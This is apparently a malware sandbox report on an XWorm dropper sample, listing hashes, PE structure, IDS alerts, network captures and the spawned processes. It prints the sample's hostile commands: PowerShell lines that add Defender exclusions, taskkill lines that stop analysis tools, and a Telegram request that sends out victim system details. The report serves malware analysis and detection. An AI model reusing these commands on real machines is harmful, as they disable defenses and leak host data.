TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
File size:	31'681'536 bytes
MD5:	fddb1131547718b6b12670fedb027d98
SHA1:	75d8b7b092fa4309073e51b88bd754c1a9e311c6
SHA256:	4397855d87d996494adbf4e56b2c79071ce12c3e6790d289b02545627a6820dd
SHA512:	766750f8e4d6a4b332c54417a32bbbfbc23fa8b462f4f3efb9f9bf8ce9277f7a2a151c114f22dba49d26292f6de25e6dc655006dadbc9cde66d5ebc380898502
SSDEEP:	786432:GD4FTr/SfnD2hwpCqur5BxfUmdzG4lLogCgVIJ9LVq6Hfmm8c:xFTeioNE1fl6NYVITq4
TLSH:	526733D45580569AF9BE1EB20770000F2074C6C77F48E7E980A7E5BB466CE4AF4EB9B1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(`.g.................P...........n... ........@.. ....................................@................................

File Icon


Icon Hash:	474785333130b470

Static PE Info

General

Entrypoint:	0x2236e9e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67066028 [Wed Oct 9 10:51:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e36e48	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e38000	0x1634	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e3a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1e34ea4	0x1e35000	e464086674e32c181988e88342204e0d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1e38000	0x1634	0x1800	dc33645df52666b4eee7f0d1df775eb9	False	0.66943359375	data	6.530535798368599	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1e3a000	0xc	0x200	8202d9abb550557feb8c167f9cd793d6	False	0.044921875	data	0.12227588125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1e38130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.7910412757973734
RT_GROUP_ICON	0x1e391d8	0x14	data	1.1
RT_VERSION	0x1e391ec	0x25c	data	0.46357615894039733
RT_MANIFEST	0x1e39448	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-13T21:36:06.785208+0200	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.10	49708	149.154.167.220	443	TCP
2024-10-13T21:36:39.917041+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.10	49710	185.84.160.88	7000	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 21:34:48.753753901 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:34:48.759160042 CEST	80	49702	208.95.112.1	192.168.2.10
Oct 13, 2024 21:34:48.759224892 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:34:48.759480000 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:34:48.764637947 CEST	80	49702	208.95.112.1	192.168.2.10
Oct 13, 2024 21:34:49.232295036 CEST	80	49702	208.95.112.1	192.168.2.10
Oct 13, 2024 21:34:49.275635958 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:35:51.799506903 CEST	80	49702	208.95.112.1	192.168.2.10
Oct 13, 2024 21:35:51.799597025 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:36:05.473083973 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:05.473145008 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:05.473277092 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:05.484251976 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:05.484275103 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.109276056 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.109414101 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.186733007 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.186795950 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.187243938 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.230441093 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.612971067 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.655417919 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.785240889 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.785332918 CEST	443	49708	149.154.167.220	192.168.2.10
Oct 13, 2024 21:36:06.785433054 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.801116943 CEST	49708	443	192.168.2.10	149.154.167.220
Oct 13, 2024 21:36:06.928756952 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:06.933850050 CEST	7000	49709	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:06.935822964 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:06.975430012 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:06.980396986 CEST	7000	49709	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:21.727680922 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:21.732691050 CEST	7000	49709	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:28.333074093 CEST	7000	49709	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:28.334547043 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:28.885479927 CEST	49709	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:28.886732101 CEST	49710	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:28.890431881 CEST	7000	49709	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:28.891516924 CEST	7000	49710	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:28.891577959 CEST	49710	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:28.906951904 CEST	49710	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:28.911814928 CEST	7000	49710	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:29.229266882 CEST	49702	80	192.168.2.10	208.95.112.1
Oct 13, 2024 21:36:29.234313011 CEST	80	49702	208.95.112.1	192.168.2.10
Oct 13, 2024 21:36:39.917041063 CEST	49710	7000	192.168.2.10	185.84.160.88
Oct 13, 2024 21:36:39.921871901 CEST	7000	49710	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:50.304126978 CEST	7000	49710	185.84.160.88	192.168.2.10
Oct 13, 2024 21:36:50.304197073 CEST	49710	7000	192.168.2.10	185.84.160.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2024 21:34:48.741087914 CEST	54468	53	192.168.2.10	1.1.1.1
Oct 13, 2024 21:34:48.748106003 CEST	53	54468	1.1.1.1	192.168.2.10
Oct 13, 2024 21:36:05.465353966 CEST	50841	53	192.168.2.10	1.1.1.1
Oct 13, 2024 21:36:05.472408056 CEST	53	50841	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 13, 2024 21:34:48.741087914 CEST	192.168.2.10	1.1.1.1	0xb090	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:36:05.465353966 CEST	192.168.2.10	1.1.1.1	0xe306	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 13, 2024 21:34:48.748106003 CEST	1.1.1.1	192.168.2.10	0xb090	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 13, 2024 21:36:05.472408056 CEST	1.1.1.1	192.168.2.10	0xe306	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49702	208.95.112.1	80	7992	C:\Users\user\AppData\Roaming\XClient.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 21:34:48.759480000 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Oct 13, 2024 21:34:49.232295036 CEST	175	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 19:34:49 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49708	149.154.167.220	443	7992	C:\Users\user\AppData\Roaming\XClient.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-13 19:36:06 UTC	408	OUT	GET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA31E5670B8AC1D800C46%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20MT6421D5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-13 19:36:06 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 13 Oct 2024 19:36:06 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-13 19:36:06 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	15:34:39
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe"
Imagebase:	0xf90000
File size:	31'681'536 bytes
MD5 hash:	FDDB1131547718B6B12670FEDB027D98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:34:42
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\MAXLEVLZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\MAXLEVLZ.exe"
Imagebase:	0x7ff624da0000
File size:	31'621'120 bytes
MD5 hash:	4AE50145B6509D7860D4DBDF52B67969
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 25%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:34:43
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:34:43
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0xbc0000
File size:	45'568 bytes
MD5 hash:	83194D1C0F097F273563914F9F693C2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:34:48
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:34:48
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c taskkill /FI "IMAGENAME eq wireshark" /IM /F /T >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /FI "IMAGENAME eq fiddler" /IM /F /T
Imagebase:	0x7ff775af0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /FI "IMAGENAME eq wireshark" /IM /F /T
Imagebase:	0x7ff775af0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Imagebase:	0x7ff775af0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop HTTPDebuggerPro
Imagebase:	0x7ff6d2690000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:34:50
Start date:	13/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /IM HTTPDebuggerSvc.exe /F
Imagebase:	0x7ff775af0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:34:51
Start date:	13/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
Imagebase:	0x7ff678440000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:35:00
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	15:35:00
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:35:16
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3228, Parent PID: 3108

General

Target ID:	24
Start time:	15:35:16
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:35:35
Start date:	13/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Imagebase:	0x7ff7b2bb0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7816, Parent PID: 4768

General

Target ID:	28
Start time:	15:35:35
Start date:	13/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:36:16
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x900000
File size:	45'568 bytes
MD5 hash:	83194D1C0F097F273563914F9F693C2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:36:24
Start date:	13/10/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x3f0000
File size:	45'568 bytes
MD5 hash:	83194D1C0F097F273563914F9F693C2E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF7BFEE10ED Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1457968425.00007FF7BFEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEE0000, based on PE: false

Joe Sandbox IDA Plugin

